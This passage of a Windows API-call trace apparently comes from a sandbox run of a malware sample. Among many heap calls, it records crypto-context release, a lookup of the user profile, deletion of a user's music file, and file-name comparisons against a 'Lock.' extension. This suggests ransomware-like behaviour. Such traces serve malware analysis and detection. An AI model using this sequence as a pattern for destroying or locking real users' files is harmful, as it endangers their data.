0x2e54ea8 [0244.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0244.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0244.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0244.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0244.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0244.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0244.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0244.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0244.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0244.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0244.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0244.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0244.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0244.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0244.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0244.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0244.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0244.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0244.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0244.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69a48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0244.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0244.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0244.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0244.300] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0244.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0244.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0244.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0244.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0244.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0244.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0244.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0244.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0244.301] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0244.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0244.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d88 [0244.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0244.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0244.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0244.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0244.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0244.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0244.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0244.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0244.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0244.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0244.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0244.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0244.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0244.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0244.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0244.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0244.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0244.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0244.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0244.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0244.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0244.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0244.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0244.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0244.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0244.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0244.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0244.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0244.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0244.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0244.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0244.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0244.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0244.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0244.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0244.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0244.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0244.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0244.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0244.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0244.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0244.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0244.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0244.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0244.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0244.303] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0244.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0244.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0244.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0244.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ae8 [0244.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0244.303] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0244.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ae8 | out: hHeap=0x970000) returned 1 [0244.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0244.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0244.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0244.303] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0244.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0244.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0244.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0244.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0244.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0244.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0244.303] FreeLibrary (hLibModule=0x756e0000) returned 1 [0244.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0244.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0244.303] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0244.304] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0244.304] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0244.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0244.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0244.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0244.304] CloseHandle (hObject=0x2d0) returned 1 [0244.306] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0244.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0244.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0244.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0244.306] CloseHandle (hObject=0x2a0) returned 1 [0244.311] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0244.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0244.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0244.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0244.312] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0244.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0244.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0244.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0244.312] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0244.313] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\DePu.wav", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\DePu.wav", lpFilePart=0x8cedf4*="DePu.wav") returned 0x1e [0244.313] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\DePu.wav" (normalized: "c:\\users\\fd1hvy\\music\\depu.wav")) returned 0x20 [0244.313] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\DePu.wav", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44131840, ftCreationTime.dwHighDateTime=0x1d5e7fa, ftLastAccessTime.dwLowDateTime=0xee597e70, ftLastAccessTime.dwHighDateTime=0x1d5efb1, ftLastWriteTime.dwLowDateTime=0xee597e70, ftLastWriteTime.dwHighDateTime=0x1d5efb1, nFileSizeHigh=0x0, nFileSizeLow=0x14dee, dwReserved0=0x1, dwReserved1=0x1c, cFileName="DePu.wav", cAlternateFileName="")) returned 0xa87250 [0244.313] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\DePu.wav" (normalized: "c:\\users\\fd1hvy\\music\\depu.wav")) returned 1 [0244.375] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44131840, ftCreationTime.dwHighDateTime=0x1d5e7fa, ftLastAccessTime.dwLowDateTime=0xee597e70, ftLastAccessTime.dwHighDateTime=0x1d5efb1, ftLastWriteTime.dwLowDateTime=0xee597e70, ftLastWriteTime.dwHighDateTime=0x1d5efb1, nFileSizeHigh=0x0, nFileSizeLow=0x14dee, dwReserved0=0x1, dwReserved1=0x1c, cFileName="DePu.wav", cAlternateFileName="")) returned 0 [0244.375] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0244.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0244.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0244.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0244.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0244.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0244.376] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0244.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0244.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0244.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0244.376] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0244.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0244.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0244.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0244.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0244.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0244.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0244.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e54858 [0244.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546e8 | out: hHeap=0x970000) returned 1 [0244.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0244.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0244.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0244.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0244.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0244.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0244.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0244.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0244.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0244.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0244.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0244.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0244.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0244.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3e) returned 0x2e78810 [0244.451] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\DePu.wav", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\DePu.wav", lpFilePart=0x8cf650*="DePu.wav") returned 0x1e [0244.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0244.451] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\DePu.wav" (normalized: "c:\\users\\fd1hvy\\music\\depu.wav")) returned 0xffffffff [0244.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0244.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0244.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0244.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0244.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0244.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0244.451] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0244.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0244.451] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0244.451] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0244.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0244.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0244.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0244.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0244.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0244.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0244.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0244.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0244.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0244.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0244.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0244.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0244.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0244.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0244.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0244.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0244.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0244.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0244.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0244.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0244.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0244.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0244.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0244.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0244.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0244.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0244.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0244.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0244.452] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0244.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0244.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0244.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0244.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0244.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0244.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0244.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0244.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0244.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0244.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0244.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0244.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0244.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0244.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0244.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0244.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0244.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 